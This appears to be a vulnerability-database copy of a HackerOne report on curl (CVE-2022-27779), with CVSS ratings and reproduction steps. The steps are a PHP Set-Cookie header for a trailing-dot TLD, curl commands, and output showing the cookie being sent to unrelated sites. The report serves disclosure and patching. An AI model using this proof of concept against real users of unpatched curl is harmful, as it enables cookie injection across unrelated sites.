Lucene search

Haxatron1H1:1553301

HistoryApr 28, 2022 - 8:30 a.m.

curl: CVE-2022-27779: cookie for trailing dot TLD

2022-04-2808:30:28

haxatron1

hackerone.com

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:N/I:P/A:N

0.005 Low

EPSS

Percentile

74.8%

JSON

Summary:

In CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl’s “cookie parser has no Public Suffix awareness”, but it will “reject TLDs from being allowed”. However, a cookie can still be set for a TLD + trailing dot.

A trailing dot after a TLD is considered legal and curl will send the http://example.com. to http://example.com

Steps To Reproduce:

Create an Apache file like the following

&lt;?php

header("Set-Cookie: a=b; Domain=.me.");

Now save the cookie to curl and see the cookie is set for .me.

curl -c cookies.txt http://localtest.me./index.php

cookies.txt:

# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

.me.    TRUE    /       FALSE   0       a       b

Requests sent via curl to the domain with TLD + ‘.’ will now contain the particular cookie.

curl -b cookies.txt http://domain.me./index.php

GET / HTTP/1.1
Host: domain.me.
User-Agent: curl/7.83.0
Accept: */*
Cookie: a=b

Impact

Cookies can be set by arbitrary sites for TLD + “.”, and if a trailing dot is used for an unrelated site, curl will send the cookie to the unrelated site.